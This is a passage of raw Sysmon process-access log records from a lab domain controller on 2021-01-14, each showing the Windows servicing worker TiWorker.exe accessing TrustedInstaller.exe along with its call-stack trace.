13:30:29.623{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.623{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.623{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.623{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.607{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.607{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.607{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.607{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.607{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.592{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.576{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 